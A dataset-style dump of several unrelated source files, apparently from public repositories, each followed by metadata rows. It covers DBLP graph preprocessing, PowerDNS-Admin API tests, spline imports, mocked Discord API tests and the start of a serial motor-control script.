APCPA_ps = sparse_mx_to_torch_sparse_tensor(sp.load_npz("{}{}".format(path, 'APCPA_ps.npz'))).to_dense()
adj = {'APA':APA_ps,'APAPA':APAPA_ps,'APCPA':APCPA_ps}
else:
APA = (PA.transpose() * PA)
APAPA = sparse_mx_to_torch_sparse_tensor(APA * APA).to_dense().long()
APA = sparse_mx_to_torch_sparse_tensor(APA).to_dense().long()
APCPA = sparse_mx_to_torch_sparse_tensor(PA.transpose() * PC * PC.transpose() * PA).to_dense().long()
adj = {'APA': APA, 'APAPA': APAPA, 'APCPA': APCPA}
# select top-K path-count neighbors of each A. If number of neighbors>K, trunc; else upsampling
schemes = ['APA','APAPA','APCPA']#
index, emb=load_edge_emb(path, schemes, n_dim=edge_dim, n_author=author_max)
node_neighs={}
edge_neighs={}
node2edge_idxs={}
edge_embs={}
edge2node_idxs={}
edge_node_adjs={}
max_degree=0
for s in schemes:
aa = adj[s]
degree = aa.shape[1]-(aa ==0).sum(dim=1)
max_degree=max(max_degree,torch.max(degree).item())
print('max degree ',max_degree)
K=max_degree
for s in schemes:
print('----{}----'.format(s))
aa = adj[s]
#count nonzero degree
degree = aa.shape[1]-(aa ==0).sum(dim=1)
print('min degree ',torch.min(degree))
degree = degree.numpy()
ind = torch.argsort(aa,dim=1)
ind = torch.flip(ind,dims=[1])
node_neigh = torch.cat([ind[i, :K].view(1, -1) if degree[i] >= K
else torch.cat(
[ind[i, :degree[i]], ind[i, np.random.choice(degree[i], K - degree[i])]]).view(1, -1)
for i in range(ind.shape[0])]
, dim=0)
print("node_neigh.shape ",node_neigh.shape)
mp_index = (index[s]).to_dense()
# print(mp_index)
mp_edge = emb[s][:,:-2]
out_dims = mp_edge.shape[1]
edge_idx_old = mp_index[
torch.arange(node_neigh.shape[0]).repeat_interleave(K).view(-1),
node_neigh.contiguous().view(-1)]
print("edge_idx_old.shape ",edge_idx_old.shape)
old2new=dict()
new2old=dict()
for e in edge_idx_old.numpy():
if e not in old2new:
old2new[e]=len(old2new)
new2old[old2new[e]]=e
assert len(old2new)==len(new2old)
print('number of unique edges ', len(old2new))
new_embs = [ new2old[i] for i in range(len(old2new))]
new_embs = mp_edge[new_embs]
edge_idx = torch.LongTensor( [old2new[i] for i in edge_idx_old.numpy()]).view(-1,K)
edge_emb = new_embs
uq = torch.unique(edge_idx.view(-1),return_counts=True)[1]
print ('max number of neighbors ', max(uq))
#edge->node adj
edge_node_adj = [[]for _ in range(len(old2new))]
for i in range(edge_idx.shape[0]):
for j in range(edge_idx.shape[1]):
edge_node_adj[ edge_idx.numpy()[i,j] ].append(i)
edge_node_adj = [np.unique(i) for i in edge_node_adj]
edge_node_adj = np.array([xi if len(xi)==2 else [xi[0],xi[0]] for xi in edge_node_adj])
# print(max(map(len, edge_node_adj)))
# edge_node_adj = np.array(edge_node_adj)
print('edge_node_adj.shape ', edge_node_adj.shape)
# #edges of line graph
# line_graph_edges = torch.cat( [edge_idx.repeat_interleave(K).reshape(-1,1), edge_idx.repeat(K,1).reshape(-1,1),
# torch.arange(node_neigh.shape[0]).repeat_interleave(K*K).view(-1,1)],dim=1).numpy()
# assert line_graph_edges.shape[1]==3
# print("line_graph_edges.shape ", line_graph_edges.shape) # [edge1, edge2, node ]
# #construct line graph
# import pandas as pd
# df = pd.DataFrame(line_graph_edges)
# edge_neigh = df.groupby(0)[1,2].apply(pd.Series.tolist) #group by edge1; [ [e2,n], .. ]
# max_len = max([len(i) for i in edge_neigh ])
# edge_neigh_result=[]
# edge_idx_result=[]
# for e,neigh in enumerate(edge_neigh):
# neigh = np.asarray(neigh)
# idx = np.random.choice(neigh.shape[0], max_len)
# edge_neigh_result.append(neigh[idx,0])
# edge_idx_result.append(neigh[idx,1])
# edge_neigh = np.vstack(edge_neigh_result)
# edge2node = np.vstack(edge_idx_result)
# edge_neighs[s] = edge_neigh
# node_neighs[s] = node_neigh
node2edge_idxs[s] = edge_idx
edge_embs[s] =edge_emb
# edge2node_idxs[s] = edge2node
edge_node_adjs[s] = edge_node_adj
# np.savez("{}edge_neighs_{}_{}.npz".format(path,K,out_dims),
# APA=edge_neighs['APA'], APAPA=edge_neighs['APAPA'], APCPA=edge_neighs['APCPA'])
# print('dump npz file {}edge_neighs.npz complete'.format(path))
# np.savez("{}node_neighs_{}_{}.npz".format(path,K,out_dims),
# APA=node_neighs['APA'], APAPA=node_neighs['APAPA'], APCPA=node_neighs['APCPA'])
# print('dump npz file {}node_neighs.npz complete'.format(path))
np.savez("{}node2edge_idxs_{}_{}.npz".format(path,K,out_dims),
APA=node2edge_idxs['APA'], APAPA=node2edge_idxs['APAPA'], APCPA=node2edge_idxs['APCPA'])
print('dump npz file {}node2edge_idxs.npz complete'.format(path))
np.savez("{}edge_embs_{}_{}.npz".format(path,K,out_dims),
APA=edge_embs['APA'], APAPA=edge_embs['APAPA'], APCPA=edge_embs['APCPA'])
print('dump npz file {}edge_embs.npz complete'.format(path))
# np.savez("{}edge2node_idxs_{}_{}.npz".format(path,K,out_dims),
# APA=edge2node_idxs['APA'], APAPA=edge2node_idxs['APAPA'], APCPA=edge2node_idxs['APCPA'])
# print('dump npz file {}edge2node_idxs.npz complete'.format(path))
np.savez("{}edge_node_adjs_{}_{}.npz".format(path, K,out_dims),
APA=edge_node_adjs['APA'], APAPA=edge_node_adjs['APAPA'], APCPA=edge_node_adjs['APCPA'])
print('dump npz file {}edge_node_adjs.npz complete'.format(path))
pass
def gen_edge_sim_adj(path='data/dblp2', K=80,edge_dim=66,sim='cos'):
"""
Args:
path:
K:
sim: similarity measure. cos:cosine.
Returns:
node_neigh:
edge_idx:
edge_emb:
edge_neigh:
"""
APA_e,n_nodes,n_emb =read_embed(path=path,emb_file='APA',emb_len=edge_dim-2)
APCPA_e,n_nodes,n_emb =read_embed(path=path,emb_file='APCPA',emb_len=edge_dim-2)
PA_file = "PA"
PC_file = "PC"
PT_file = "PT"
# print("{}{}.txt".format(path, PA_file))
PA = np.genfromtxt("{}{}.txt".format(path, PA_file),
dtype=np.int32)
PC = np.genfromtxt("{}{}.txt".format(path, PC_file),
dtype=np.int32)
PT = np.genfromtxt("{}{}.txt".format(path, PT_file),
dtype=np.int32)
PA[:, 0] -= 1
PA[:, 1] -= 1
PC[:, 0] -= 1
PC[:, 1] -= 1
PT[:, 0] -= 1
PT[:, 1] -= 1
paper_max = max(PA[:, 0]) + 1
author_max = max(PA[:, 1]) + 1
conf_max = max(PC[:,1])+1
term_max = max(PT[:, 1]) + 1
PA = sp.coo_matrix((np.ones(PA.shape[0]), (PA[:, 0], PA[:, 1])),
shape=(paper_max, author_max),
dtype=np.int32)
PT = sp.coo_matrix((np.ones(PT.shape[0]), (PT[:, 0], PT[:, 1])),
shape=(paper_max, term_max),
dtype=np.int32)
PC = sp.coo_matrix((np.ones(PC.shape[0]), (PC[:, 0], PC[:, 1])),
shape=(paper_max, conf_max),
dtype=np.int32)
if sim=='cos':
from sklearn.metrics.pairwise import cosine_similarity
# s = cosine_similarity(self.emd, self.emd) # dense output
APA = (PA.transpose() * PA)
APAPA = torch.from_numpy(cosine_similarity(APA * APA))
APA = torch.from_numpy(cosine_similarity(APA))
APCPA = torch.from_numpy(cosine_similarity(PA.transpose() * PC * PC.transpose() * PA))
adj = {'APA': APA, 'APAPA': APAPA, 'APCPA': APCPA}
else:
APA = (PA.transpose() * PA)
APAPA = sparse_mx_to_torch_sparse_tensor(APA * APA).to_dense().long()
APA = sparse_mx_to_torch_sparse_tensor(APA).to_dense().long()
APCPA = sparse_mx_to_torch_sparse_tensor(PA.transpose() * PC * PC.transpose() * PA).to_dense().long()
adj = {'APA': APA, 'APAPA': APAPA, 'APCPA': APCPA}
# select top-K path-count neighbors of each A. If number of neighbors>K, trunc; else upsampling
schemes = ['APA','APAPA','APCPA']#
index, emb=load_edge_emb(path, schemes, n_dim=edge_dim, n_author=author_max)
node_emb={'APA':APA_e,'APAPA':APA_e,'APCPA':APCPA_e,}
node_neighs={}
edge_neighs={}
node2edge_idxs={}
edge_embs={}
edge2node_idxs={}
edge_node_adjs={}
for s in schemes:
print('----{}----'.format(s))
aa = adj[s]
ne = node_emb[s]
#count nonzero degree
degree = aa.shape[1]-(aa ==0).sum(dim=1)
print('min degree ',torch.min(degree))
degree = degree.numpy()
ind = torch.argsort(aa,dim=1)
ind = torch.flip(ind,dims=[1])
node_neigh = torch.cat([ind[i, :K].view(1, -1) if degree[i] >= K
else torch.cat(
[ind[i, :degree[i]], ind[i, np.random.choice(degree[i], K - degree[i])]]).view(1, -1)
for i in range(ind.shape[0])]
, dim=0)
print("node_neigh.shape ",node_neigh.shape)
mp_index = (index[s]).to_dense()
# print(mp_index)
mp_edge = (emb[s][:,:-2])
out_dims = mp_edge.shape[1]
edge_idx_unfold = torch.cat([
torch.arange(node_neigh.shape[0]).repeat_interleave(K).view(-1,1),
node_neigh.contiguous().view(-1,1)],dim=1) #shape(-1,2)
print("edge_idx_unfold.shape ",edge_idx_unfold.shape)
# max_edge = mp_index.max()
edgeHash2emb = dict()
edge2node=[]
new_embs = []
edge_idx_new = []
n_counter = 0
# counter = 0
for e in edge_idx_unfold.numpy():
n1=e[0]
n2=e[1]
edge_hash1 = n1*node_neigh.shape[0]+n2
edge_hash2 = n2*node_neigh.shape[0]+n1
if edge_hash1 in edgeHash2emb or edge_hash2 in edgeHash2emb:
edge_idx_new.append(edgeHash2emb[edge_hash1])
else:
edgeHash2emb[edge_hash1] = len(new_embs)
edgeHash2emb[edge_hash2] = len(new_embs)
edge_idx_new.append(len(new_embs))
edge2node.append([n1,n2])
edge_id = mp_index[n1][n2]
if edge_id==0:
#no edge between
new_embs.append((ne[n1]+ne[n2])/2)
n_counter += 1
# edge_idx_old.append(len(edge_idx_old)+max_edge)
else:
new_embs.append(mp_edge[edge_id])
print('number of empty edges ', n_counter)
print('number of edges ', len(new_embs))
edge_idx = np.array(edge_idx_new).reshape(-1,K)
print('edge_idx.shape ', edge_idx.shape)
edge_emb = np.vstack(new_embs)
print('edge_emb.shape ', edge_emb.shape)
edge_node_adj = np.array(edge2node)
print('edge_node_adj.shape ', edge_node_adj.shape)
node2edge_idxs[s] = edge_idx
edge_embs[s] =edge_emb
edge_node_adjs[s] = edge_node_adj
np.savez("{}node2edge_idxs_{}_{}_cos.npz".format(path,K,out_dims),
APA=node2edge_idxs['APA'], APAPA=node2edge_idxs['APAPA'], APCPA=node2edge_idxs['APCPA'])
print('dump npz file {}node2edge_idxs2.npz complete'.format(path))
np.savez("{}edge_embs_{}_{}_cos.npz".format(path,K,out_dims),
APA=edge_embs['APA'], APAPA=edge_embs['APAPA'], APCPA=edge_embs['APCPA'])
print('dump npz file {}edge_embs2.npz complete'.format(path))
np.savez("{}edge_node_adjs_{}_{}_cos.npz".format(path, K,out_dims),
APA=edge_node_adjs['APA'], APAPA=edge_node_adjs['APAPA'], APCPA=edge_node_adjs['APCPA'])
print('dump npz file {}edge_node_adjs2.npz complete'.format(path))
pass
if __name__ == '__main__':
#clean_dblp()
#gen_homograph()
# dump_edge_emb(emb_len=128)
#gen_homoadj()
gen_walk(path='../data/dblp2/')
# gen_edge_adj(K=5,path='../data/dblp2/', edge_dim=130)
# gen_edge_sim_adj(path='../data/dblp2/', K=10,edge_dim=18,sim='cos')
| 35.176007 | 127 | 0.525155 | 5,696 | 40,171 | 3.533708 | 0.055302 | 0.040242 | 0.019674 | 0.023996 | 0.798837 | 0.769277 | 0.744684 | 0.729829 | 0.716862 | 0.696542 | 0 | 0.02937 | 0.304971 | 40,171 | 1,141 | 128 | 35.206836 | 0.691404 | 0.19422 | 0 | 0.727763 | 0 | 0 | 0.073933 | 0.009897 | 0 | 0 | 0 | 0 | 0.002695 | 1 | 0.016173 | false | 0.006739 | 0.009434 | 0 | 0.030997 | 0.057951 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
9090ed6ab07eeed90a7c670b5593260c071f646a | 3,298 | py | Python | tests/integration/api/zone/test_apikey_admin_user.py | warf/PowerDNS-Admin | 3bf6e6e9f119d2af7f2faff46c41a2152b84d3ab | [
"MIT"
] | 1,431 | 2015-12-13T11:10:33.000Z | 2021-12-08T03:12:01.000Z | tests/integration/api/zone/test_apikey_admin_user.py | warf/PowerDNS-Admin | 3bf6e6e9f119d2af7f2faff46c41a2152b84d3ab | [
"MIT"
] | 954 | 2015-12-30T17:08:47.000Z | 2021-12-10T21:32:00.000Z | tests/integration/api/zone/test_apikey_admin_user.py | warf/PowerDNS-Admin | 3bf6e6e9f119d2af7f2faff46c41a2152b84d3ab | [
"MIT"
] | 625 | 2016-01-05T07:44:22.000Z | 2021-12-10T08:54:29.000Z | import json
from collections import namedtuple
from powerdnsadmin.lib.validators import validate_zone
from powerdnsadmin.lib.schema import DomainSchema
from tests.fixtures import client
from tests.fixtures import zone_data, initial_apikey_data
from tests.fixtures import admin_apikey_integration
class TestIntegrationApiZoneAdminApiKey(object):
def test_empty_get(self, client, initial_apikey_data,
admin_apikey_integration):
res = client.get("/api/v1/servers/localhost/zones",
headers=admin_apikey_integration)
data = res.get_json(force=True)
assert res.status_code == 200
assert data == []
def test_create_zone(self, client, initial_apikey_data, zone_data,
admin_apikey_integration):
res = client.post("/api/v1/servers/localhost/zones",
headers=admin_apikey_integration,
data=json.dumps(zone_data),
content_type="application/json")
data = res.get_json(force=True)
data['rrsets'] = []
validate_zone(data)
assert res.status_code == 201
zone_url_format = "/api/v1/servers/localhost/zones/{0}"
zone_url = zone_url_format.format(zone_data['name'].rstrip("."))
res = client.delete(zone_url, headers=admin_apikey_integration)
assert res.status_code == 204
def test_get_multiple_zones(self, client, initial_apikey_data, zone_data,
admin_apikey_integration):
res = client.post("/api/v1/servers/localhost/zones",
headers=admin_apikey_integration,
data=json.dumps(zone_data),
content_type="application/json")
data = res.get_json(force=True)
data['rrsets'] = []
validate_zone(data)
assert res.status_code == 201
res = client.get("/api/v1/servers/localhost/zones",
headers=admin_apikey_integration)
data = res.get_json(force=True)
fake_domain = namedtuple("Domain", data[0].keys())(*data[0].values())
domain_schema = DomainSchema(many=True)
json.dumps(domain_schema.dump([fake_domain]))
assert res.status_code == 200
zone_url_format = "/api/v1/servers/localhost/zones/{0}"
zone_url = zone_url_format.format(zone_data['name'].rstrip("."))
res = client.delete(zone_url, headers=admin_apikey_integration)
assert res.status_code == 204
def test_delete_zone(self, client, initial_apikey_data, zone_data,
admin_apikey_integration):
res = client.post("/api/v1/servers/localhost/zones",
headers=admin_apikey_integration,
data=json.dumps(zone_data),
content_type="application/json")
data = res.get_json(force=True)
data['rrsets'] = []
validate_zone(data)
assert res.status_code == 201
zone_url_format = "/api/v1/servers/localhost/zones/{0}"
zone_url = zone_url_format.format(zone_data['name'].rstrip("."))
res = client.delete(zone_url, headers=admin_apikey_integration)
assert res.status_code == 204
| 40.219512 | 77 | 0.625834 | 378 | 3,298 | 5.203704 | 0.166667 | 0.052872 | 0.145399 | 0.085409 | 0.760041 | 0.725979 | 0.712761 | 0.712761 | 0.712761 | 0.712761 | 0 | 0.01541 | 0.271983 | 3,298 | 81 | 78 | 40.716049 | 0.803832 | 0 | 0 | 0.75 | 0 | 0 | 0.105215 | 0.078836 | 0 | 0 | 0 | 0 | 0.140625 | 1 | 0.0625 | false | 0 | 0.109375 | 0 | 0.1875 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
90b744ac6c075f335319499ea0755b71b43f6918 | 297 | py | Python | manifold_flow/transforms/splines/__init__.py | selflein/manifold-flow | 2cc91c7acf61c8b4df07a940f0311ee93c39f0c7 | [
"MIT"
] | 199 | 2020-03-31T22:45:31.000Z | 2022-03-18T14:57:23.000Z | manifold_flow/transforms/splines/__init__.py | selflein/manifold-flow | 2cc91c7acf61c8b4df07a940f0311ee93c39f0c7 | [
"MIT"
] | 4 | 2020-04-04T18:45:33.000Z | 2022-01-05T03:16:07.000Z | manifold_flow/transforms/splines/__init__.py | selflein/manifold-flow | 2cc91c7acf61c8b4df07a940f0311ee93c39f0c7 | [
"MIT"
] | 25 | 2020-04-01T11:04:11.000Z | 2022-03-30T17:21:44.000Z | from .linear import linear_spline, unconstrained_linear_spline
from .quadratic import quadratic_spline, unconstrained_quadratic_spline
from .cubic import cubic_spline, unconstrained_cubic_spline
from .rational_quadratic import rational_quadratic_spline, unconstrained_rational_quadratic_spline
| 37.125 | 98 | 0.895623 | 35 | 297 | 7.171429 | 0.228571 | 0.302789 | 0.223108 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.077441 | 297 | 7 | 99 | 42.428571 | 0.916058 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 0 | 0 | 0 | null | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
90c8a26e2ae9f8196fa5502881d38fe00f52cc82 | 12,919 | py | Python | tests/test_network_calls.py | Squidtoon99/dispike | db4b1a12268afcc87a96003923e6f56139872f0e | [
"MIT"
] | null | null | null | tests/test_network_calls.py | Squidtoon99/dispike | db4b1a12268afcc87a96003923e6f56139872f0e | [
"MIT"
] | null | null | null | tests/test_network_calls.py | Squidtoon99/dispike | db4b1a12268afcc87a96003923e6f56139872f0e | [
"MIT"
] | null | null | null | from dispike.register.models.options import (
CommandChoice,
CommandOption,
CommandTypes,
DiscordCommand,
)
from httpx import Response
from dispike.models.incoming import IncomingApplicationCommand
from dispike import Dispike
from pydantic import ValidationError
import pytest
from dispike.errors.network import DiscordAPIError
from nacl.encoding import HexEncoder
from nacl.signing import SigningKey
import respx
@pytest.fixture
def dispike_object():
_generated_signing_key = SigningKey.generate()
verification_key = _generated_signing_key.verify_key.encode(encoder=HexEncoder)
return Dispike(
client_public_key=verification_key.decode(),
bot_token="BOTTOKEN",
application_id="APPID",
)
@respx.mock
def test_get_commands_globally_call_successful(dispike_object: Dispike):
respx.get(f"https://discord.com/api/v8/applications/APPID/commands").mock(
return_value=Response(
200,
json=[
{
"id": "1234",
"application_id": "7890",
"name": "mccoolbotv1",
"description": "McCoolbot is the coolest bot around.",
"options": [
{"type": 6, "name": "wave", "description": "wave at a person"}
],
},
{
"id": "3344",
"application_id": "7890",
"name": "mccoolbotv2",
"description": "send a message",
"options": [
{"type": 3, "name": "message", "description": "send a message"}
],
},
],
)
)
_get_commands = dispike_object.get_commands()
for item in _get_commands:
assert isinstance(item, IncomingApplicationCommand) == True
assert len(_get_commands) == 2
@respx.mock
def test_get_commands_globally_call_fail(dispike_object: Dispike):
respx.get("https://discord.com/api/v8/applications/APPID/commands").mock(
return_value=Response(
500,
json=[
{
"id": "1234",
"application_id": "7890",
"name": "mccoolbotv1",
"description": "McCoolbot is the coolest bot around.",
"options": [
{"type": 6, "name": "wave", "description": "wave at a person"}
],
},
{
"id": "3344",
"application_id": "7890",
"name": "mccoolbotv2",
"description": "send a message",
"options": [
{"type": 3, "name": "message", "description": "send a message"}
],
},
],
)
)
with pytest.raises(DiscordAPIError):
_get_commands = dispike_object.get_commands()
@respx.mock
def test_get_commands_globally_call_invalid_incoming(dispike_object: Dispike):
respx.get(f"https://discord.com/api/v8/applications/APPID/commands").mock(
return_value=Response(
200,
json=[
{
"id": "1234",
"application_id": "7890",
"name": "mccoolbotv1",
"options": [
{"type": 6, "name": "wave", "description": "wave at a person"}
],
},
{
"id": "3344",
"application_id": "7890",
"description": "send a message",
"options": [
{"type": 3, "name": "message", "description": "send a message"}
],
},
],
)
)
with pytest.raises(ValidationError):
_get_commands = dispike_object.get_commands()
@respx.mock
def test_get_commands_guild_only_call_successful(dispike_object: Dispike):
respx.get(
"https://discord.com/api/v8/applications/APPID/guilds/EXAMPLE_GUILD/commands"
).mock(
return_value=Response(
200,
json=[
{
"id": "1234",
"application_id": "7890",
"name": "mccoolbotv1",
"description": "McCoolbot is the coolest bot around.",
"options": [
{"type": 6, "name": "wave", "description": "wave at a person"}
],
},
{
"id": "3344",
"application_id": "7890",
"name": "mccoolbotv2",
"description": "send a message",
"options": [
{"type": 3, "name": "message", "description": "send a message"}
],
},
],
)
)
_get_commands = dispike_object.get_commands(
guild_only=True, guild_id_passed="EXAMPLE_GUILD"
)
for item in _get_commands:
assert isinstance(item, IncomingApplicationCommand) == True
assert len(_get_commands) == 2
@respx.mock
def test_get_commands_guild_only_call_fail(dispike_object: Dispike):
respx.get(
"https://discord.com/api/v8/applications/APPID/guilds/EXAMPLE_GUILD/commands"
).mock(
return_value=Response(
404,
json=[
{
"id": "1234",
"application_id": "7890",
"name": "mccoolbotv1",
"description": "McCoolbot is the coolest bot around.",
"options": [
{"type": 6, "name": "wave", "description": "wave at a person"}
],
},
{
"id": "3344",
"application_id": "7890",
"name": "mccoolbotv2",
"description": "send a message",
"options": [
{"type": 3, "name": "message", "description": "send a message"}
],
},
],
)
)
with pytest.raises(DiscordAPIError):
_get_commands = dispike_object.get_commands(
guild_only=True, guild_id_passed="EXAMPLE_GUILD"
)
@respx.mock
def test_get_commands_guild_only_call_invalid_incoming(dispike_object: Dispike):
respx.get(
"https://discord.com/api/v8/applications/APPID/guilds/EXAMPLE_GUILD/commands"
).mock(
return_value=Response(
200,
json=[
{
"id": "1234",
"application_id": "7890",
"name": "mccoolbotv1",
"options": [
{"type": 6, "name": "wave", "description": "wave at a person"}
],
},
{
"id": "3344",
"application_id": "7890",
"description": "send a message",
"options": [
{"type": 3, "name": "message", "description": "send a message"}
],
},
],
)
)
with pytest.raises(ValidationError):
_get_commands = dispike_object.get_commands(
guild_only=True, guild_id_passed="EXAMPLE_GUILD"
)
@pytest.fixture
def example_edit_command():
return DiscordCommand(
name="exampleCommand",
description="exampleCommandDescription",
options=[
CommandOption(
name="exampleOption",
type=CommandTypes.USER,
description="exampleOptionDescription",
required=True,
choices=[CommandChoice(name="test", value="value")],
)
],
)
@respx.mock
def test_bulk_edit_command_guild_only(
dispike_object: Dispike, example_edit_command: DiscordCommand
):
respx.put(
"https://discord.com/api/v8/applications/APPID/guilds/EXAMPLE_GUILD/commands"
).mock(
return_value=Response(
200,
json=[example_edit_command.dict(), example_edit_command.dict()],
)
)
_edit_command = dispike_object.edit_command(
new_command=[example_edit_command, example_edit_command],
guild_only=True,
bulk=True,
guild_id_passed="EXAMPLE_GUILD",
)
assert isinstance(_edit_command, list) == True
assert len(_edit_command) == 2
for command in _edit_command:
assert isinstance(command, DiscordCommand)
assert command.id == example_edit_command.id
assert command.name == example_edit_command.name
@respx.mock
def test_bulk_edit_command_globally(
dispike_object: Dispike, example_edit_command: DiscordCommand
):
respx.patch("https://discord.com/api/v8/applications/APPID/commands").mock(
return_value=Response(
200,
json=[example_edit_command.dict(), example_edit_command.dict()],
)
)
_edit_command = dispike_object.edit_command(
new_command=example_edit_command, bulk=True
)
assert isinstance(_edit_command, list) == True
assert len(_edit_command) == 2
for command in _edit_command:
assert isinstance(command, DiscordCommand)
assert command.id == example_edit_command.id
assert command.name == example_edit_command.name
@respx.mock
def test_single_edit_command_globally(
dispike_object: Dispike, example_edit_command: DiscordCommand
):
respx.patch("https://discord.com/api/v8/applications/APPID/commands").mock(
return_value=Response(
200,
json=example_edit_command.dict(),
)
)
_edit_command = dispike_object.edit_command(new_command=example_edit_command)
assert isinstance(_edit_command, DiscordCommand) == True, type(_edit_command)
assert _edit_command.id == example_edit_command.id
assert _edit_command.name == example_edit_command.name
@respx.mock
def test_single_edit_command_guild_only(
dispike_object: Dispike, example_edit_command: DiscordCommand
):
respx.patch(
"https://discord.com/api/v8/applications/APPID/guilds/EXAMPLE_GUILD/commands/1234"
).mock(
return_value=Response(
200,
json=example_edit_command.dict(),
)
)
_edit_command = dispike_object.edit_command(
new_command=example_edit_command,
command_id=1234,
guild_only=True,
guild_id_passed="EXAMPLE_GUILD",
)
_edit_command: DiscordCommand
assert isinstance(_edit_command, DiscordCommand) == True
assert _edit_command.id == example_edit_command.id
assert _edit_command.name == example_edit_command.name
@respx.mock
def test_delete_command_guild_only(
dispike_object: Dispike, example_edit_command: DiscordCommand
):
respx.delete(
"https://discord.com/api/v8/applications/APPID/guilds/EXAMPLE_GUILD/commands/1234"
).mock(
return_value=Response(
204,
json=example_edit_command.dict(),
)
)
_delete_command = dispike_object.delete_command(
command_id=1234,
guild_only=True,
guild_id_passed="EXAMPLE_GUILD",
)
assert _delete_command == True
@respx.mock
def test_failed_delete_command_guild_only(
dispike_object: Dispike, example_edit_command: DiscordCommand
):
respx.delete(
"https://discord.com/api/v8/applications/APPID/guilds/EXAMPLE_GUILD/commands/1234"
).mock(
return_value=Response(
500,
json=example_edit_command.dict(),
)
)
with pytest.raises(DiscordAPIError):
_delete_command = dispike_object.delete_command(
command_id=1234,
guild_only=True,
guild_id_passed="EXAMPLE_GUILD",
)
@respx.mock
def test_delete_command_globally(
dispike_object: Dispike,
):
respx.delete("https://discord.com/api/v8/applications/APPID/commands/1234").mock(
return_value=Response(
204,
)
)
_delete_command = dispike_object.delete_command(command_id=1234)
assert _delete_command == True
@respx.mock
def test_failed_delete_command_globally(
dispike_object: Dispike,
):
respx.delete("https://discord.com/api/v8/applications/APPID/commands/1234").mock(
return_value=Response(
500,
)
)
with pytest.raises(DiscordAPIError):
_delete_command = dispike_object.delete_command(command_id=1234)
def test_get_commands_invalid_guild_id_passed(dispike_object: Dispike):
with pytest.raises(TypeError):
dispike_object.get_commands(guild_only=True)
| 31.356796 | 90 | 0.557164 | 1,214 | 12,919 | 5.658155 | 0.101318 | 0.086475 | 0.073373 | 0.03261 | 0.855146 | 0.848158 | 0.834037 | 0.816276 | 0.803319 | 0.789052 | 0 | 0.025364 | 0.334701 | 12,919 | 411 | 91 | 31.43309 | 0.773822 | 0 | 0 | 0.657534 | 0 | 0.008219 | 0.189721 | 0.003793 | 0 | 0 | 0 | 0 | 0.060274 | 1 | 0.046575 | false | 0.021918 | 0.027397 | 0.00274 | 0.079452 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 6 |
90c98e48c5568b2f961ffc671df39b928cf3dfb2 | 18 | py | Python | lib/assets/Lib/browser/svg.py | s6007589/cafe-grader-web | 18a993801c698fb7b7ec6ae5f4b67920503cb242 | [
"MIT"
] | 5,926 | 2015-01-01T07:45:08.000Z | 2022-03-31T12:34:38.000Z | lib/assets/Lib/browser/svg.py | it56660024/cafe-grader-web | e9a1305fd62e79e54f6961f97ddc5cd57bafd73c | [
"MIT"
] | 1,728 | 2015-01-01T01:09:12.000Z | 2022-03-30T23:25:22.000Z | lib/assets/Lib/browser/svg.py | it56660024/cafe-grader-web | e9a1305fd62e79e54f6961f97ddc5cd57bafd73c | [
"MIT"
] | 574 | 2015-01-02T01:36:10.000Z | 2022-03-26T10:18:48.000Z | from _svg import * | 18 | 18 | 0.777778 | 3 | 18 | 4.333333 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.166667 | 18 | 1 | 18 | 18 | 0.866667 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | true | 0 | 1 | 0 | 1 | 0 | 1 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | 1 | 0 | 0 | 6 |
90c9a5a0a3fe6878b14ad82637eb61fac7c3acb9 | 1,448 | py | Python | eMotion/control.py | yuxiang-zhou/eMotion | 9ed19b6f7fe8820f96fdca4dd1ad83fa80cc10ac | [
"MIT"
] | null | null | null | eMotion/control.py | yuxiang-zhou/eMotion | 9ed19b6f7fe8820f96fdca4dd1ad83fa80cc10ac | [
"MIT"
] | null | null | null | eMotion/control.py | yuxiang-zhou/eMotion | 9ed19b6f7fe8820f96fdca4dd1ad83fa80cc10ac | [
"MIT"
] | null | null | null | import serial
import numpy as np
import time
ser = serial.Serial(3, 9600)
# {0xBA,0x01,0xEA,0x60,0x01,0x03,0x02,0x30,0x00,0x63,0x9C,0x00,0x0A,0x02,0x26,0xA1,0xFE}
#define DEFAULT_BACKWARD_BYTE {0xBA,0x01,0xEA,0x60,0x01,0x03,0x01,0x30,0x00,0x63,0x9C,0x00,0x0A,0x02,0x26,0xA1,0xFE}
#define DEFAULT_STOP_BYTE {0xBA,0x01,0xEA,0x60,0x01,0x03,0x03,0x30,0x00,0x63,0x9C,0x00,0x0A,0x02,0x26,0xA1,0xFE}
def forawrd(deviceID):
